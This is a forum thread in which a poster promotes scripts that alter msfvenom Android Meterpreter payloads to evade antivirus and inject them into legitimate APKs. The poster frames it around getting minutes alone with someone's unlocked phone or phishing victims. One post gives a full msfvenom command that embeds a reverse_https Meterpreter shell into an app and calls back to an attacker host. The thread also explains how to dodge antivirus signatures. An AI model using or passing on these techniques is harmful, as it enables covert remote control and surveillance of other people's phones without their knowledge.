Jump to content

Android - Meterpreter Payload - AV Bypass + APK Injector Scripts


n33dsh3llz

Recommended Posts

Hello everyone,

This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY!

I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only  a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone.

Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files.

 

Github:

https://github.com/jbreed/apkwash

https://github.com/jbreed/apkinjector

Link to comment
Share on other sites

  • 2 weeks later...

hi
every time i'm trying to run scripts this message appear

 "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali!

 Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue."

i run apt-get update &apt-get upgrade before script

i'm using kali Sana

Link to comment
Share on other sites

2 hours ago, unlinkable said:

hi
every time i'm trying to run scripts this message appear

 "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali!

 Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue."

i run apt-get update &apt-get upgrade before script

i'm using kali Sana

 

What is happening is the script is seeing PayloadTrustManager.smali in the pulled apart payload generated by MSFVenom. This payload has a signature I havent spent time avoiding by AVG. The quickest solution is to make sure you are completely updated. On Kali Rolling:

apt-get dist-upgrade

apt-get update

apt-get upgrade

 

 

Also, after spending a weekend throwing this together I realized the '-x' option on MSFVenom appears to get the job done as well for injecting into other payloads. So if wanting to do a phishing attack instead of using apkinjector you can use msfvenom with the apk to inject into followed by the -x option. Of course, the bash script is very similar to what msfvenom is doing so looking it over will give you an understanding on what is happening and if it is flagged by an AV you can simply modify the bash script to get around it.

 

Edited by n33dsh3llz
msfvenom -p android/meterpreter/reverse_https LPORT=XXXX LHOST=X.X.X.X -x original.apk -o payload.apk
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...